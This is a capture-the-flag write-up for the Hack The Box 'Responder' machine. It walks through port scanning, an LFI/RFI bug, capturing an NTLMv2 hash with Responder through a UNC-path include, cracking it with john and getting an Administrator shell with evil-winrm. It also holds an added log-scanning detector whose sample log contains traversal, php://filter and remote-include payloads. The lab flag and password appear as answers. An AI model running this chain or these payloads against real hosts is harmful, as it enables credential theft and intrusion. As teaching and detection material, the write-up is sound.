HTB Responder Writeup

Related material

Task 1

Q:How many TCP ports are open on the machine?

┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p1-65535 10.129.42.95
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 16:12 CST
Nmap scan report for 10.129.42.95
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  wsman
7680/tcp open  pando-pub

Nmap done: 1 IP address (1 host up) scanned in 790.35 seconds

Any port scanner will do; this exact command is not required. Most of the 790 seconds go to -sC (default NSE scripts) combined with a full 1-65535 sweep: run the port sweep alone first, then script and version scans (-sC -sV) only against the three open ports. -Pn skips host discovery, which is needed here because the box does not answer ping.

A:3

Task 2

Q:When visiting the web service using the IP address, what is the domain that we are being redirected to?

Open the IP in a browser (or look at the Location header of the response) and see where it redirects.

A:unika.htb

Task 3

Q:Which scripting language is being used on the server to generate webpages?

Capture the request in a proxy (e.g. Burp) and read the response headers; the server advertises PHP there.

For the redirect to work, add the line `10.129.42.95 unika.htb` to /etc/hosts so the hostname resolves to the box instead of failing to resolve.

A:php

Task 4

Q:What is the name of the URL parameter which is used to load different language versions of the webpage?

Click any of the language links and look at the URL: the file to load is passed in a query parameter, e.g. ?page=french.html.

A:page

Task 5

Q:Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

The question asks which value is a Local File Include: the path-traversal one, which walks up the directory tree with ../ and reads a file from the web server's own disk.

A:../../../../../../../../windows/system32/drivers/etc/hosts

Task 6

Q:Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

The question asks which value is a Remote File Include: the one that points at another host. //10.10.14.6/somefile is a UNC path, which matters in Task 10: when PHP on Windows includes it, the server connects to that host over SMB and authenticates.

A://10.10.14.6/somefile
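The LFI/RFI distinction in Tasks 5 and 6 is also what a detection rule looks for. The following is an added example, not code from the writeup: it scans constructed Apache-style access-log lines for the `page` parameter and labels each value LFI, RFI or benign. The log lines, timestamps and the extra payload variants (an encoded traversal, an http:// include, a php://filter read) are constructed for the example; the classifier is a heuristic, not a complete model of every PHP stream wrapper.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined-log prefix; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# PHP wrappers that still read from the local box (php://filter is the classic
# LFI source-disclosure trick); anything else with a scheme reaches out.
LOCAL_WRAPPERS = {"php", "file", "phar", "zip", "glob", "compress.zlib"}


def classify(value: str) -> str:
    """Label one page= value as 'LFI', 'RFI' or 'benign' (heuristic)."""
    # Second decode catches double-encoded payloads; \\host\share == //host/share.
    v = unquote(value).replace("\\", "/")
    m = re.match(r"^([a-z][a-z0-9+.-]*)://", v, re.I)
    if m:
        # http:// and ftp:// includes need allow_url_include=On in php.ini.
        return "LFI" if m.group(1).lower() in LOCAL_WRAPPERS else "RFI"
    if v.startswith("//"):
        # UNC path: PHP on Windows hands \\host\share to the OS, which opens an
        # SMB session and authenticates with NTLM even with allow_url_include=Off.
        # That is the behaviour Responder's SMB server relies on.
        return "RFI"
    if "../" in v or re.match(r"^(?:[a-z]:)?/", v, re.I):
        return "LFI"  # traversal or absolute local path
    return "benign"


def scan_log(text: str, param: str = "page"):
    """Return (client_ip, raw_value, label) for every non-benign value of `param`."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify(raw)
            if label != "benign":
                hits.append((m["ip"], raw, label))
    return hits


# Constructed log lines (not from the page): the Task 5/6 candidates plus an
# encoded traversal, an http:// include and a php://filter source read.
SAMPLE_LOG = """\
10.10.14.6 - - [05/May/2022:16:20:01 +0800] "GET /index.php?page=french.html HTTP/1.1" 200 4421
10.10.14.6 - - [05/May/2022:16:20:05 +0800] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824
10.10.14.6 - - [05/May/2022:16:20:09 +0800] "GET /index.php?page=//10.10.14.6/somefile HTTP/1.1" 200 0
10.10.14.6 - - [05/May/2022:16:20:12 +0800] "GET /index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 92
10.10.14.6 - - [05/May/2022:16:20:15 +0800] "GET /index.php?page=http://10.10.14.6/shell.txt HTTP/1.1" 200 0
10.10.14.6 - - [05/May/2022:16:20:18 +0800] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 6110
"""

if __name__ == "__main__":
    for ip, value, label in scan_log(SAMPLE_LOG):
        print(f"{label:<6} {ip:<12} page={value}")
```

The remediation side is the mirror image of the classifier: the page name should be matched against an allow-list of known language files rather than handed to include(), at which point none of these values reach the filesystem or the network.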

Task 7

Q:What does NTLM stand for?

NTLM is a suite of authentication protocols created by Microsoft. It is a challenge-response protocol used to authenticate a client to resources, both in an Active Directory domain and, as on this box, against local accounts on a standalone Windows host.

A:New Technology LAN Manager

Task 8

Q:Which flag do we use in the Responder utility to specify the network interface?

From the Responder usage: -I selects the network interface it listens on.

A:-I

Task 9

Q:There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?

This is for cracking the hash; worth giving it a try together with Responder and seeing what comes out.

A:john the ripper

Task 10

Q:What is the password for the administrator user?

First start Responder listening on the local tun0 (VPN) interface. Of everything in the listing below, only the SMB server matters for this box: the victim will be pointed at us explicitly through the RFI, so the LLMNR/NBT-NS poisoners are not what captures the hash here.

┌──(root💀kali)-[~]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.7.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.86]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-BEA716J9KXD]
    Responder Domain Name      [HALN.LOCAL]
    Responder DCE-RPC Port     [47831]

[+] Listening for events...                                                  

Visit http://unika.htb/?page=//<your tun0 address>/somefile, using the address Responder reports under Generic Options (10.10.16.86 in the session above; 10.10.14.6 is the example from the task text).

The server then tries to include a file from our host. PHP on Windows treats //host/share as a UNC path and opens an SMB connection to it, authenticating as the account the web server runs under (Administrator here), and Responder's rogue SMB server records the NetNTLMv2 challenge/response.

[SMB] NTLMv2-SSP Client   : 10.129.42.95
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:c0c8045502c4f5c...
[*] Skipping previously captured hash for RESPONDER\Administrator

Then save the hash line (the NTLMv2-SSP Hash value, everything from Administrator::RESPONDER: onwards) to a file and crack it with john. This can take a while.

┌──(root💀kali)-[~/桌面]
└─# john 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII


Damn, it's been running for two hours and still hasn't cracked it.

Run with no options, john tries single-crack mode, then the small bundled password.lst, then incremental (brute-force) mode, which is where the time goes. The usual approach is to point it at a large wordlist with --wordlist=<file>.

A:badminton

Task 11

Q:We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

The service is WinRM (WS-Management, which nmap labels wsman) on TCP 5985.

A:5985

Flag

Install the evil-winrm tool:

┌──(root💀kali)-[~]
└─# gem install evil-winrm

Connect with the cracked password:

┌──(root💀kali)-[~]
└─# evil-winrm -i 10.129.42.95 -u Administrator -p badminton

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                   

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                     

Info: Establishing connection to remote endpoint

Read the flag. It is not in Administrator's profile but on mike's desktop:

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../../mike
*Evil-WinRM* PS C:\Users\mike> dir


    Directory: C:\Users\mike


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2022   4:51 AM                Desktop


*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir


    Directory: C:\Users\mike\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt


*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac

flag:ea81b7afddd03efaa0945333ed147fac
